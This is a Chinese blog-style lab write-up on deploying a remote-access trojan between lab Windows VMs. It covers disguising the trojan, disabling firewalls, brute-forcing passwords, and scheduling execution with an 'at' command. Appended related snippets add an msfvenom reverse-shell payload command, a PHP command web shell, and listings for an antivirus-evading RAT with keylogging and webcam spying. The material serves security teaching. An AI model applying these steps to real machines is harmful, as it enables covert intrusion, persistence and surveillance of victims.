基础木马实验

最新推荐文章于 2024-10-30 23:39:50 发布
原创 最新推荐文章于 2024-10-30 23:39:50 发布 · 1k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

基础木马实验

使用大白鲨远程管理工具

实验环境

客户端:windows xp
在这里插入图片描述
服务端:windows server 2003 r2
在这里插入图片描述

本地攻击

启动大白鲨软件
在这里插入图片描述
配置程序
在这里插入图片描述
ip处设置为当前主机的ip地址
在这里插入图片描述
点击生成服务端:
在这里插入图片描述
可以对生成的服务端程序进行修改文件名和更换图标,使得更具有隐蔽性,生成之后在主机中进行点击出发木马程序:
在这里插入图片描述
客户端程序中出现该上线的主机,可以在客户端中进行一些列的操作,各种参数的信息都显示在客户端中

远程攻击

上线服务端被攻击主机
配置两台攻击主机和被攻击主机在同一个局域网
win+r打开运行界面,输入control打开控制面板,选择网络和internet连接
在这里插入图片描述
进入后选择网络连接
在这里插入图片描述
右键选择本地连接的属性
在这里插入图片描述
选择TCP/IP的协议进入修改ip地址
在这里插入图片描述
服务端也进行相同的配置,保证两者在同一个局域网内
在这里插入图片描述
接下来就是要将木马的程序发送到服务端的主机上,在此之前先确保两者的防火墙处于关闭的状态,运行firewall.cpl进行检查:
在这里插入图片描述
获取服务端的用户密码:
使用字典工具进行暴力破解
运行终端命令和服务端程序进行连接:

在这里插入图片描述
复制木马程序到服务端的主机上并且运行,使得获得连接。

进一步使用

设置windows的计划任务程序,使得木马病毒定时启动

at \\10.0.0.2 12:12 \\10.0.0.2\c$\XXXX.exe

设置捆绑,将病毒软件和别的文件捆绑在一起,使得用户点击后自动运行。

木马攻击实验
qq_45768092的博客
10-19 3410
木马攻击实验 计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能表面无害的恶意代码,是具备破坏和删除文件、发送密码、记录键盘等特殊功能的后门程序。 学员需在本实验中通过“冰河”木马的使用,掌握木马的工作原理以及清除方法。 实验简介 实验所属系列:系统安全攻防技术与实践 实验对象: 本科/专科信息安全专业 相关课程及专业:计算机基础,网络安全 实验时数(学分):2学时 实验类别:实践实验类 预备知识 木马是隐藏在正常程序中的具有特殊功能恶意代码,是具备破坏,删除和修改文件,发送密码,记录键盘,实施Dos攻击
木马基础知识要点
weixin_30265103的博客
04-04 2444
0x00 木马隐藏手段 程序中; 配置文件中; Win.ini中; 普通文件中; 注册表中; 驱动中(rootkit); 启动组(启动项); winstart.bat中(早于启动组); 启动文件中; 超链接中 0x01 木马发展   第一代:DLL(win中动态链接库的意思)木马。采用进程隐藏。采用内核推入式的嵌入方式,利用远程插入进程技术,嵌入到DLL进程,或...
木马程序的配置和使用实验
caesarding07
11-27 1995
木马程序的配置和使用实验实验准备实验环境实验过程生成木马控制文件通过nc.exe 开启远程shell通过远程shell传输木马文件 实验准备 控制机A和被控制机都需要安装两个软件 实验环境 控制机A 目标主机B IP:192.168.6.128 实验过程 生成木马控制文件 打开pcShare生成控制文件 不建议使用80端口,80端口一般被web占用,或者被保护 ip地址要控制在自己列表范围内(随意) 点击生成,建议放在控制机A nc程序的同级目录下 通过nc.exe 开启远程shell 在目
黑洞木马实验
qq_43717119的博客
06-22 1680
实验20 黑洞木马实验实验目的】 1、了解木马感染的手段 2、掌握利用木马的办法 【实验环境】 系统环境:2台windows 2003 实验工具:Blackhole(D:\攻防工具包\黑洞木马) EXE捆绑机(D:\攻防工具包\黑洞木马\EXE捆绑机) 【实验预备知识点】 1、 木马程序(Trojan horse program)通常称为木马,恶意代码等,是指潜伏在电脑中,可受外部用户控制以窃取本机信息或者控制权的程序。木马指的是特洛伊木马,英文叫做“Trojan horse”,其名称取自希腊神话的特洛
网络安全基础木马、概述、冰河木马实验
Pluto.的博客
12-10 5392
文章目录网络安全基础一、木马1. 概述2. 特性3. 组成4. 危害5. 传播途径6. 模拟实验 网络安全基础 一、木马 1. 概述 木马通常成为黑客程序,恶意代码,也称特洛伊木马,是一个基于远程控制的黑客工具,木马程序表面上是无害的,甚至对没有警戒的用户还颇有吸引力,它们经常隐藏在游戏或图形软件中,但它们却隐藏着恶意。 2. 特性 隐蔽性 将自己伪装成合法应用程序,使得用户难以识别,这是木马病毒的首要也是重要的特征。 潜伏性 木马病毒隐蔽的主要手段是欺骗,经常使用伪装的手段将自己合法化。例如,使用合法的
Android木马分析实验,Android木马简介与分析
weixin_42500130的博客
05-26 1570
本文介绍基于Android的手机恶意软件,是一个基础性的介绍,给新入门的人提供一个分析和工具指引。要分析的木马是一个2013年的syssecApp.apk,这个木马的分析能对Android恶意软件有个大概了解。基础:1 –Android应用基础Android是google开发基于Linux内核的开源的手机操作系统,应用程序使用JAVA语言编写并转换成了Dalvik虚拟机,而虚拟机 则提供了一个抽象...
北理大学计算机实验基础-实验18实验报告表.docx
03-10
实验报告表18-3木马攻击实验结果 局域网设备 感染方式 可能结果 1 执行病毒 被入侵 2 发送邮件 入侵电脑 3 4 5 注:未感染填无。 北理大学计算机实验基础-实验18实验报告表全文共2页,当前为第2页。北理大学计算机...
"Winsock编程基础木马原理实验安排
本文介绍了WINSOCK编程基础的PPT内容,主要包括WINSOCK的概述、控件的属性、方法和事件,以及木马原理的实验安排。通过本课程的学习,希望学生能够了解windows socket、熟练掌握winsock控件的属性、方法和事件,以及...
简单的木马制作并且运用
m0_46317658的博客
01-13 5140
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序并在目标主机上执行在本地监听上线。 实验环境:kali和windows7 在kali终端中进行: 一: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/h
病毒实验木马病毒实验
12-06
了解木马程序的结构、传播方法、安装与自启动机制,加深木马病毒原理的认识;掌握木马病毒的查杀一般方法。
大白鲨vip免杀远控
01-04
大白鲨vip免杀远控 功能超强 最新免杀 过360 金山 江民 瑞星 主动防御
大白鲨远程控制V1.5
04-20
大白鲨远控1.5 运行平台:Win2K、WinXP、Win03、WinVista、Win07、(Win2008没测试) 软件简介: 单一exe,不带DLL文件! DATA文件夹里面的有两个RAR文件,分配为两个功能完全相同的DATA.FILE: “DATA(注入进程兼容Win7).rar” //该DATA无壳, 没配置前 110KB ,压缩 51KB "DATA(注入进程不兼容Win7).rar" //该DATA无壳, 没配置前 390KB ,压缩 173KB 功能简介: 1.屏幕监控,可以查看对方屏幕以及鼠标监控、键盘监控、强制关闭显示器等。 2.视频监控、可以查看对方视频,含有MSH263,IndeoVideo5.04,IntelIndeo(R)VideoR3.2编码 3.CMD命令:模拟CMD。也就是telnet命令执行 4.文件管理:磁盘空间查看、文件浏览、WinRAR压缩解压(必须有安装WINRAR)、执行文件(以后缀执行/Exe类型执行)、上传、下载、删除、新建(文件/文件夹)... 5.进程管理:进程信息查看。包括进程创建时间,父进程ID等..,可以结束进程。 6.服务管理:服务信息查看。包括服务的PID、启动时间、模块路径、描述。等查看,可以对服务进行基本操作. 7.注册表管理:类似于注册表模拟器,可以删除指定注册表值,键,以及新建等.. 8.窗口管理:可以设置窗口标题、对窗口的其他操作,比如关闭窗口(包括父窗口)或隐藏窗口等... 9.键盘记录:可以查看对方输入了哪个键盘按键。 10.附加功能:分为“信息查看”与“插件管理”。 <1>信息查看:可以看对方系统信息,服务端配置信息,宽带信息需要上传指定插件才能查看! <2>插件管理”能上传插件“比如HTTP代理与宽带密码查看插件”。 11.其他管理:有点类似与恶作剧,有禁止鼠标活动与键盘活动功能==,还有查看剪切板字符串==等功能。 12.批量操作:分为“筛选主机”、“修改配置”、“发送信息”、“其它操作”4个面板! <1>筛选主机:可以筛选你先要进行批量操作的主机,如内存大于512MB,小于2048MB的主机=。 <2>修改配置:可以修改上线信息,如IP、端口或者备注! <3>发送信息:分为发生“窗口信息”和“屏幕字体”两种信息。 <4>其它操作:可以下载URL文件,隐藏打开网页、重启、关机、开启3389端口、更新被控端==功能 __________________________________________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^升级日志^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ UpdateTo1.5 1.31升级到1.4更新了有些多,因此该版本主要是1.4的修正版本!增强稳定性 更新日志: 1.增强稳定性 2.修正控制端与被控端停止视频编码/解码器的时候没释放掉的一些内存 3.其它代码更新... 修复BUG 1.其它远控的被控端会上线到大白鲨这来 2.被控端异常断线探测修正 3.控制端关闭的时候有其他网络的程序连接到大白鲨来可能会导致客服端卡住的bug 不兼容1.31版本之前的 __________________________________________________________________________________________________________ UpdateTo1.4 更新日志: 1.更新网络模块,可同时上线上万主机 2.屏幕模块,添加键盘发送、图片保存、透明区域截取、全屏模式、屏幕缩放模式、组合键发送=;(核心算法为DG大哥的,博客iamgyg.blog.163.com) 3.更新视频模块,支持USB无驱视频,传输速度流畅,添加 IntelIndeo(R)VideoR3.2 和 IndeoVideo5.04 编码 4.服务端添加非正常断线探测; 5.进程模块(添加显示进程创建时间,以及优化代码) 6.服务模块(添加已启动的服务的启动时间查看还有PID,以及优化代码) 7.注册表模块,以及代码优化 8.窗口模块(添加PID与窗口进程所在路径查看) 9.添加主机信息复制, 10.添加判断WIN7系统 11.其它更新 修正BUG 1.文件管理的文件修改时间显示错误。 2.时间久了会可能会出现播放有主机下线声音(实际上没看到主机下线) 3.修复win7系统下注入进程后无法创建线程,导致无法连接网络, 4.修复截取系统登录界面白屏
2009大白鲨远程控制软件.zip
09-22
VC++6.0编写的程序,供参考学习远程控制程序开发
大白鲨远控1.5共享版
06-08
大白鲨远控1.5共享版是专业超级远程控制。超强的管理功能,适用于电脑爱好者、家庭、学校、公司、单位远程管理计算机! ----------------
VMware win10虚拟机跑一个简单的木马实验
m0_51478477的博客
06-14 1553
基于python实现一个简单的木马实验:在客户端中读取服务端的文件,在VMware中跑通。
4.2 木马攻防实验
qq_55202378的博客
07-27 1970
木马攻防
信息安全原理与技术第七次实验木马攻击与防范
sjx3161的博客
06-04 8610
为了帮助同学们完成痛苦的实验课程设计,本作者将其作出的实验结果及代码贴至优快云中,供同学们学习参考。如有不足或描述不完善之处,敬请各位指出,欢迎各位的斧正!1.掌握目前网络中常见的七种木马的检测及清除方法; 2.学会使用工具检测并清除木马。1.木马的概念与发展历史 计算机世界中的特洛伊木马病毒的名字由《荷马史诗》的特洛伊战记得来。故事说的是希腊人围攻特洛伊城十年后仍不能得手,于是阿迦门农受雅典娜的启发:把士兵藏匿于巨大无比的木马中,然后佯作退兵。当特洛伊人将木马作为战利品拖入城内时,高大的木马正好卡在城门
简单渗透实验——kali一句话木马实现远程操控
最新发布
a250278984的博客
10-30 1334
例如,如果URL是http://example.com/page.php?cmd=ls -la,那么$_REQUEST[‘cmd’]的值将是ls -la。二、apache服务开启后,可用物理机访问虚拟机的ip,我这里的ip是172.XX.XX.XX,在浏览器上访问,局部图如下。system() 是PHP中的一个函数,用于执行外部程序,并显示输出。例如,system(‘ls -la’) 将在类Unix系统上列出当前目录的文件和目录。这是PHP代码的开头和结尾标记。使用Kali的终端,输入代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值